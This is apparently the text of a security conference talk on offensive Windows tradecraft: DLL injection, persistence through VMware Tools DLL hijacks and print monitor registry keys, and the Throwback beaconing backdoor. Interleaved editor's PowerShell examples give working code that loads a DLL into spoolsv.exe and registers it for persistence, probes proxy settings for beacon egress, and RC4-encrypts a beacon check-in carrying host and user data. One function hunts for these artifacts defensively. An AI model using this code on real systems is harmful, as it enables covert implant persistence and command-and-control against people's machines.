Brady Bloxham
Founder/Principal Security Consultant
@silentbreaksec
http://www.silentbreaksecurity.com
http://www.blacksquirrel.io

Background
- Shorten the gap between penetration test and actual attack
- Few covert persistence tools
- Reduce reliance on Metasploit

Got a lot to cover
- DLL injection
- Persistence
- Throwback
- Lots of demos along the way

DLL Injection
Traditional methods
- CreateRemoteThread()
- NtCreateThreadEx()
- RtlCreateUserThread()
- NtQueueApcThread()
- Can blue screen certain OSes
Code cave
- Suspend process
- Inject code
- Change EIP to location of injected code
- Resume process
- Difficult on x64
AddMonitor()
- Injects into spoolsv.exe
- Doesn't require matching architecture
- Easy to use - DLL must be on disk
- Requires administrator privs

DLL Injection Demo

Persistence
- Lots of persistence in Windows: services, Run keys, schtasks... and lots still to find.
- Ways to find more: Process Monitor, hooking LoadLibrary()

Persistence: 1st Technique
- Requires VMware Tools be installed
- Just drop a DLL to disk: c:\windows\system32\wbem\ntdsapi.dll
- Note: the DLL must export the same functions as the real ntdsapi.dll

Persistence: 2nd Technique
- VMware patched in ESXi 5.5
- Requires VMware Tools be installed
- Just drop a DLL to disk: c:\windows\system32\wbem\tpgenlic.dll or c:\windows\system32\wbem\thinmon.dll

Persistence: 3rd Technique
- HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\
- Create a new key
- Create a new value named Driver with the DLL name
- Create as many as you like

Persistence Demo

Windows API HTTP Cheatsheet
WinHTTP
- Intended for services
- Does not pull user proxy settings
- Supports impersonation
WinINet
- More robust in proxy environments
- Variety of flags that enable/disable functionality
- Automatically prompts the user for a password if authentication is required
- Uses IE settings

What is Throwback?
- C++ HTTP/S beaconing backdoor
- PHP control panel w/ MySQL backend
- Built for stealth
- Persistence built-in
- DLL
- Exe

[Architecture diagram; labels: Infected User, Proxy, Firewall, ThrowbackLP, Attacker, ThrowbackLP]
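The AddMonitor() injection method and the 3rd persistence technique above are two ends of the same mechanism: AddMonitor() makes spoolsv.exe load the DLL immediately and writes the Print\Monitors registry key itself, while writing the key by hand gets only the load at the next spooler start. The following editor's example (not code from the talk or from Throwback) does both, plus the hunt a responder would run for all three persistence techniques on the slides. Assumptions: administrator rights; the monitor DLL matches spoolsv.exe's bitness (64-bit on a 64-bit OS, regardless of the caller's bitness); and the monitor name and DLL name in the usage comment are placeholders.

```powershell
# Editor's example, not Throwback code.
if (-not ('PrintMon' -as [type])) {
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class PrintMon {
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
    public struct MONITOR_INFO_2 { public string pName; public string pEnvironment; public string pDLLName; }
    [DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
    public static extern bool AddMonitorA(string pName, uint Level, ref MONITOR_INFO_2 pMonitors);
    [DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
    public static extern bool DeleteMonitorA(string pName, string pEnvironment, string pMonitorName);
}
'@
}
$MonitorsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors'
$SpoolerEnvironment = if ([Environment]::Is64BitOperatingSystem) { 'Windows x64' } else { 'Windows NT x86' }

function Install-PrintMonitor {
    # AddMonitor() path: loads into spoolsv.exe now and registers for every later boot.
    param([Parameter(Mandatory)][string]$Name, [Parameter(Mandatory)][string]$DllPath)
    $dllName = [IO.Path]::GetFileName($DllPath)
    # The spooler resolves pDLLName against its own directory, so the DLL must sit in System32.
    Copy-Item -LiteralPath $DllPath -Destination (Join-Path $env:SystemRoot "System32\$dllName") -Force
    $mi = New-Object PrintMon+MONITOR_INFO_2
    $mi.pName = $Name
    $mi.pEnvironment = $SpoolerEnvironment
    $mi.pDLLName = $dllName
    if (-not [PrintMon]::AddMonitorA($null, 2, [ref]$mi)) {
        throw "AddMonitor failed: Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    # The spooler wrote the Driver value for us; return it so the caller can confirm.
    return (Get-ItemProperty -Path (Join-Path $MonitorsKey $Name) -Name Driver).Driver
}

function Set-PrintMonitorRegistry {
    # The talk's 3rd technique: registry only, picked up at the next spooler start.
    param([Parameter(Mandatory)][string]$Name, [Parameter(Mandatory)][string]$DllName)
    $key = New-Item -Path $MonitorsKey -Name $Name -Force
    New-ItemProperty -Path $key.PSPath -Name Driver -Value $DllName -PropertyType String -Force | Out-Null
}

function Remove-PrintMonitor {
    param([Parameter(Mandatory)][string]$Name)
    return [PrintMon]::DeleteMonitorA($null, $SpoolerEnvironment, $Name)   # removes the key; the DLL stays loaded until spoolsv restarts
}

function Get-PersistenceArtifacts {
    # Hunt for all three techniques: print monitors whose Driver DLL is missing or not
    # Microsoft-signed, and the VMware Tools search-order paths under System32\wbem.
    $system32 = Join-Path $env:SystemRoot 'System32'
    foreach ($k in Get-ChildItem -Path $MonitorsKey) {
        $driver = (Get-ItemProperty -Path $k.PSPath -Name Driver -ErrorAction SilentlyContinue).Driver
        if (-not $driver) { continue }
        $path = Join-Path $system32 $driver
        $sig = if (Test-Path -LiteralPath $path) { Get-AuthenticodeSignature -FilePath $path } else { $null }
        [pscustomobject]@{
            Kind = 'PrintMonitor'; Name = $k.PSChildName; Path = $path
            Suspicious = -not ($sig -and $sig.Status -eq 'Valid' -and $sig.SignerCertificate.Subject -like '*Microsoft*')
        }
    }
    foreach ($dll in 'ntdsapi.dll', 'tpgenlic.dll', 'thinmon.dll') {
        # The talk's point is that nothing legitimate puts these names under wbem, so presence alone is the signal.
        $path = Join-Path $system32 "wbem\$dll"
        [pscustomobject]@{ Kind = 'VMwareToolsHijack'; Name = $dll; Path = $path; Suspicious = (Test-Path -LiteralPath $path) }
    }
}

# Usage (placeholder names):
# Install-PrintMonitor -Name 'Example Port' -DllPath .\monitor.dll
# Get-PersistenceArtifacts | Where-Object Suspicious
```

Two caveats the slides leave implicit: the spooler unloads a monitor DLL that does not export InitializePrintMonitor2, so the payload has to do its work from DllMain or a thread it starts there; and the hunt flags by signature rather than by an allowlist of monitor names precisely because the slide says an attacker can "create as many as you like" under any name.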
Throwback Features
- Robust proxy detection
- Distributed LPs
- Generates MSI payloads
- RC4 encrypted comms
- Implements reflective DLL injection
- String encryption

Throwback Demo

Going Forward!
- Community based project!!!
- Create modules: keylogger, Mimikatz, hashdump, etc.
- Various transport methods
- Additional persistence techniques
- Modification of comms

The End

Shameless Plug
- Interested in writing custom malware/backdoors? Dark Side Ops: Custom Penetration Testing
- Blackhat Europe and East Coast trainings
- Pen test networks from your browser: https://www.blacksquirrel.io
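The Windows API HTTP cheatsheet earlier says WinHTTP does not pull the user's proxy settings while WinINet follows the IE configuration, and "robust proxy detection" in the Throwback feature list is about closing that gap. The following, added by the editor and not Throwback's own code, shows the three views a beacon author has to reconcile on a host: the per-user WinINet/IE configuration, read through WinHTTP's own WinHttpGetIEProxyConfigForCurrentUser so that a service-context program can fetch it; the machine-wide WinHTTP default from netsh; and what .NET actually picks for a given URL. The default target URL is an assumption.

```powershell
# Editor's example, not Throwback code.
if (-not ('WinHttpProxy' -as [type])) {
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class WinHttpProxy {
    [StructLayout(LayoutKind.Sequential)]
    public struct IE_PROXY_CONFIG {          // WINHTTP_CURRENT_USER_IE_PROXY_CONFIG
        public bool fAutoDetect;             // BOOL
        public IntPtr lpszAutoConfigUrl;     // LPWSTR, caller frees with GlobalFree
        public IntPtr lpszProxy;
        public IntPtr lpszProxyBypass;
    }
    [DllImport("winhttp.dll", SetLastError = true)]
    public static extern bool WinHttpGetIEProxyConfigForCurrentUser(ref IE_PROXY_CONFIG pProxyConfig);
    [DllImport("kernel32.dll")]
    public static extern IntPtr GlobalFree(IntPtr hMem);
}
'@
}

function Read-AndFreeLpwstr([IntPtr]$Ptr) {
    if ($Ptr -eq [IntPtr]::Zero) { return $null }
    $s = [Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
    [void][WinHttpProxy]::GlobalFree($Ptr)
    return $s
}

function Get-ProxyViews {
    param([uri]$Target = 'https://www.silentbreaksecurity.com/')   # assumed target, any URL works
    # 1. WinINet / IE view (per user). WinHTTP code has to ask for this explicitly,
    #    which is what a beacon running as a service (impersonating the user) must do.
    $cfg = New-Object WinHttpProxy+IE_PROXY_CONFIG
    if (-not [WinHttpProxy]::WinHttpGetIEProxyConfigForCurrentUser([ref]$cfg)) {
        throw "WinHttpGetIEProxyConfigForCurrentUser failed: Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    $wininet = [pscustomobject]@{
        AutoDetect    = $cfg.fAutoDetect
        AutoConfigUrl = Read-AndFreeLpwstr $cfg.lpszAutoConfigUrl
        Proxy         = Read-AndFreeLpwstr $cfg.lpszProxy
        Bypass        = Read-AndFreeLpwstr $cfg.lpszProxyBypass
    }
    # 2. WinHTTP machine default: what a service gets with no extra work at all.
    $winhttp = (netsh winhttp show proxy | Where-Object { $_ -match '\S' }) -join ' | '
    # 3. What .NET resolves for this URL; it follows the WinINet/IE view, PAC included.
    $sys = [Net.WebRequest]::GetSystemWebProxy()
    $resolved = if ($sys.IsBypassed($Target)) { 'DIRECT' } else { $sys.GetProxy($Target).AbsoluteUri }
    return [pscustomobject]@{ WinINet = $wininet; WinHTTP = $winhttp; DotNetPicksForTarget = $resolved }
}

# Usage: Get-ProxyViews | Format-List
```

On a typical corporate desktop the WinINet view carries a PAC URL or proxy and the WinHTTP view reads "Direct access (no proxy server)", which is exactly the case where a WinHTTP-only beacon in a service context never gets out.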
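Throwback's comms are RC4 encrypted. As an editor's example (not Throwback's code, whose message format is its own), here is RC4 written out in PowerShell with a known-answer check, used to wrap a constructed beacon check-in the way a beacon and its LP would. The key is a placeholder and the check-in fields are made up for the example.

```powershell
# Editor's example, not Throwback code.
function Invoke-RC4 {
    # RC4 is symmetric: the same call encrypts and decrypts.
    param([Parameter(Mandatory)][byte[]]$Key, [Parameter(Mandatory)][byte[]]$Data)
    # Key-scheduling algorithm: permute S under the key.
    $S = [int[]](0..255)
    $j = 0
    for ($i = 0; $i -lt 256; $i++) {
        $j = ($j + $S[$i] + $Key[$i % $Key.Length]) -band 0xFF
        $t = $S[$i]; $S[$i] = $S[$j]; $S[$j] = $t
    }
    # Pseudo-random generation: one keystream byte per data byte, XORed in.
    $out = New-Object byte[] $Data.Length
    $i = 0; $j = 0
    for ($n = 0; $n -lt $Data.Length; $n++) {
        $i = ($i + 1) -band 0xFF
        $j = ($j + $S[$i]) -band 0xFF
        $t = $S[$i]; $S[$i] = $S[$j]; $S[$j] = $t
        $out[$n] = $Data[$n] -bxor $S[($S[$i] + $S[$j]) -band 0xFF]
    }
    return ,$out
}

# Known-answer check against the standard RC4 test vector (key "Key", plaintext "Plaintext").
$kat = Invoke-RC4 -Key ([Text.Encoding]::ASCII.GetBytes('Key')) -Data ([Text.Encoding]::ASCII.GetBytes('Plaintext'))
if (([BitConverter]::ToString($kat) -replace '-') -ne 'BBF316E8D940AF0AD3') { throw 'RC4 implementation is wrong' }

function New-Beacon {
    # Beacon side: build the check-in, encrypt, Base64 for transport in an HTTP body.
    param([byte[]]$Key, [string]$Hostname, [string]$User, [int]$ProcessId)
    $checkin = "host=$Hostname&user=$User&pid=$ProcessId&ts=$([DateTimeOffset]::UtcNow.ToUnixTimeSeconds())"
    return [Convert]::ToBase64String((Invoke-RC4 -Key $Key -Data ([Text.Encoding]::UTF8.GetBytes($checkin))))
}

function Read-Beacon {
    # LP side: undo the encoding and parse the fields back into a table.
    param([byte[]]$Key, [string]$Body)
    $plain = [Text.Encoding]::UTF8.GetString((Invoke-RC4 -Key $Key -Data ([Convert]::FromBase64String($Body))))
    $fields = @{}
    foreach ($pair in ($plain -split '&')) { $k, $v = $pair -split '=', 2; $fields[$k] = $v }
    return $fields
}

$key = [Text.Encoding]::ASCII.GetBytes('placeholder-static-key')   # in an implant this lives in the binary
$body = New-Beacon -Key $key -Hostname $env:COMPUTERNAME -User $env:USERNAME -ProcessId $PID
$fields = Read-Beacon -Key $key -Body $body
$fields.host   # the same hostname that went in
```

Two things to keep in mind when you build on this: a static key recovered from the binary (or from the LP) decrypts every captured check-in after the fact, and RC4 provides no integrity, so an LP that acts on decrypted fields without some separate authentication will happily process a forged or bit-flipped body.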
Silent Break Security
Blackbox/Red Team Pen Testing
brady@silentbreaksecurity.com
@silentbreaksec
https://github.com/silentbreaksec